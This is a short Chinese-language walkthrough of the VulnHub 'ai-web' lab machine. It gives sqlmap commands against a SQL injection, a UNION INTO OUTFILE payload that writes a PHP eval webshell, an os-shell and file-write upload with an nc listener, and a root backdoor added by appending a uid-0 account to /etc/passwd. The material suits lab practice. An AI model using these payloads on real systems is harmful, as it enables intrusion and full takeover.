vulnhub靶机通关(1)ai-web-爱代码爱编程
- 首先使用nmap探测端口开放情况,只开放了80端口
- 使用disearch探测目录,看下robots.txt内容
- 找到两个禁止访问的目录,丢到dirsearch扫到phpinfo,另外一个存在SQL注入的地方
4.se3reTdir777存在注入,但是最后的账号密码是假的,没任何用处,但是结合phpinfo泄露的网站绝对路径,可以尝试osshell或者outfile个文件
python sqlmap.py -u "http://192.168.234.148/se3reTdir777/" --data="uid=1&Operation=Submit" --level=3 --dbs
5.尝试outfile,选择在uploads目录下才有写入权限
-1' union select 1,2,'<?php @eval($_POST[123]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/a.php"#
6.尝试使用--os-shell
python sqlmap.py -u "http://192.168.234.148/se3reTdir777/" --data="uid=1&Operation=Submit" --os-shell
写入交互shell,使用kali linux nc -nlvp 1234
Python Sqlmap.py -u "http://192.168.234.148/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./hack.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php
7.提权
先使用python转换为交互式shell
python -c 'import pty;pty.spawn("/bin/bash")
因为www-data对/etc/passwd有操作权限,所以可以生成一条标识号为0的账号进去
openssl passwd -1 -salt test test $1$test$pi/xDtU5WFVRqYS6BMU8X/
然后模仿/etc/passwd写进去 echo ‘test:$1$test$pi/xDtU5WFVRqYS6BMU8X/
:0:0::/root:/bin/bash’>>/etc/passwd
最后在切换test用户,su test
成功拿到root权限
读取/root/flag.txt